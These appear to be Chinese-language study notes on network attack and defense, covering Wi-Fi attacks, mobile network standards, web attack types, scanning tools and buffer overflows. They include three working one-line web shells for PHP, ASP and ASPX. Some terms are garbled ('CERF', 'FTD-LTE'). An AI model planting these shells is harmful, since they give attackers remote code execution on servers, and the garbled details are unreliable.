网络对抗笔记

无线技术

wifi攻击方式：Krack 协议wpa2，发展wep、wpa、wpa2

无线网络主动扫描直接探针:IMEI,SSID,手机号，MAC

中国4G制式标准

联通TD-LTE,FTD-LTE

电信TD-LTE,FTD-LTE

移动TD-LTE

中国3G制式标准

联通WCDMA

电信CDMA2000

移动TD-SCDMA

中国2G制式标准

联通GSM

电信CDMA

移动GSM

Web攻击技术

类别：XSS（跨站脚本攻击）、CERF（跨站伪造攻击）、SQL注入

工具：Nmap：扫描端口，Nessus：扫描系统漏洞，APPscan：Web漏洞扫描，Nikto:网页服务器扫描器，Whatweb:网站指纹识别，X-scan:网络综合扫描，Netcat:网络测试工具（后门）

一句话木马：

php的一句话木马： <?php @eval($_POST['pass']);?>
asp的一句话是： <%eval request ("pass")%>
aspx的一句话是： <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

XSS攻击类型：反射型XSS、存储型XSS、DOM型XSS

缓冲区溢出：

栈溢出：注意gets(name);与字符串的长度

堆溢出：注意memset函数

格式化串溢出：注意printf函数

BSS溢出：变量与变量之间为连续存放

 XSS

 

 

 

 CSRF